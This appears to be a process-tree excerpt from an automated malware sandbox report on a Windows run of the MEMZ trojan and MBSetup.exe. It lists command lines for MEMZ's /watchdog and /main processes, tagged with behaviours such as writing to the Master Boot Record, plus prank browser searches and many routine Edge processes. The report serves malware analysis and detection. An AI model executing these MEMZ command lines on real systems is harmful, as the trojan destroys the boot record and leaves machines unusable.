C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5636 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2352

C:\Users\Admin\Downloads\MBSetup.exe
"C:\Users\Admin\Downloads\MBSetup.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5184

C:\Users\Admin\Downloads\MBSetup.exe
"C:\Users\Admin\Downloads\MBSetup.exe"
3⤵
- Executes dropped EXE
PID:1516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1828 /prefetch:1
3⤵
PID:3388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
3⤵
PID:6760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1
3⤵
PID:5144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
3⤵
PID:6100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:1
3⤵
PID:4000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6444 /prefetch:1
3⤵
PID:4316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7120 /prefetch:8
3⤵
PID:1780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
3⤵
PID:2416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6416 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
3⤵
PID:968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7096 /prefetch:1
3⤵
PID:6216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
3⤵
PID:1832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:1
3⤵
PID:5260

C:\Users\Admin\Downloads\MEMZ (1).exe
"C:\Users\Admin\Downloads\MEMZ (1).exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:2348

C:\Users\Admin\Downloads\MEMZ (1).exe
"C:\Users\Admin\Downloads\MEMZ (1).exe" /watchdog
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1868

C:\Users\Admin\Downloads\MEMZ (1).exe
"C:\Users\Admin\Downloads\MEMZ (1).exe" /watchdog
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2504

C:\Users\Admin\Downloads\MEMZ (1).exe
"C:\Users\Admin\Downloads\MEMZ (1).exe" /watchdog
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5888

C:\Users\Admin\Downloads\MEMZ (1).exe
"C:\Users\Admin\Downloads\MEMZ (1).exe" /watchdog
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3324

C:\Users\Admin\Downloads\MEMZ (1).exe
"C:\Users\Admin\Downloads\MEMZ (1).exe" /watchdog
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2960

C:\Users\Admin\Downloads\MEMZ (1).exe
"C:\Users\Admin\Downloads\MEMZ (1).exe" /main
4⤵
- Checks computer location settings
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:4168

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" \note.txt
5⤵
PID:4284

C:\Windows\SysWOW64\mmc.exe
"C:\Windows\System32\mmc.exe"
5⤵
- Suspicious use of SetWindowsHookEx
PID:1336

C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe"
6⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3332

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=batch+virus+download
5⤵
PID:4964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0xf8,0x134,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=dank+memz
5⤵
PID:5736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:5664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=virus+builder+legit+free+download
5⤵
PID:1364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:2160

C:\Windows\SysWOW64\mmc.exe
"C:\Windows\System32\mmc.exe"
5⤵
- Suspicious use of SetWindowsHookEx
PID:2852

C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:5192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=mcafee+vs+norton
5⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
6⤵
PID:2140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
6⤵
PID:5104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:8
6⤵
PID:4700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
6⤵
PID:4824

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
6⤵
PID:2596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
6⤵
PID:1876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
6⤵
PID:4308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:1
6⤵
PID:6732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
6⤵
PID:1048

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
6⤵
PID:960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1
6⤵
PID:1292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1
6⤵
PID:5000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4424 /prefetch:1
6⤵
PID:4548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:1
6⤵
PID:6132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
6⤵
PID:4368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
6⤵
PID:1568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5393638718805771254,2770318554323185604,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
6⤵
PID:1452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://motherboard.vice.com/read/watch-this-malware-turn-a-computer-into-a-digital-hellscape
5⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:2372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,1692358679913594860,12104510088981562676,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
6⤵
PID:1224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,1692358679913594860,12104510088981562676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
6⤵
PID:6012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,1692358679913594860,12104510088981562676,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8
6⤵
PID:2156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,1692358679913594860,12104510088981562676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
6⤵
PID:4560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,1692358679913594860,12104510088981562676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
6⤵
PID:3092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,1692358679913594860,12104510088981562676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
6⤵
PID:6336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,1692358679913594860,12104510088981562676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
6⤵
PID:6180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,1692358679913594860,12104510088981562676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
6⤵
PID:4628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,1692358679913594860,12104510088981562676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
6⤵
PID:5916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,1692358679913594860,12104510088981562676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
6⤵
PID:1372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=my+computer+is+doing+weird+things+wtf+is+happenin+plz+halp
5⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x100,0x128,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:6504

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,8558316842690580817,8950803290243422001,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
6⤵
PID:3084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,8558316842690580817,8950803290243422001,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
6⤵
PID:5868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,8558316842690580817,8950803290243422001,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
6⤵
PID:5996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8558316842690580817,8950803290243422001,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
6⤵
PID:2556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
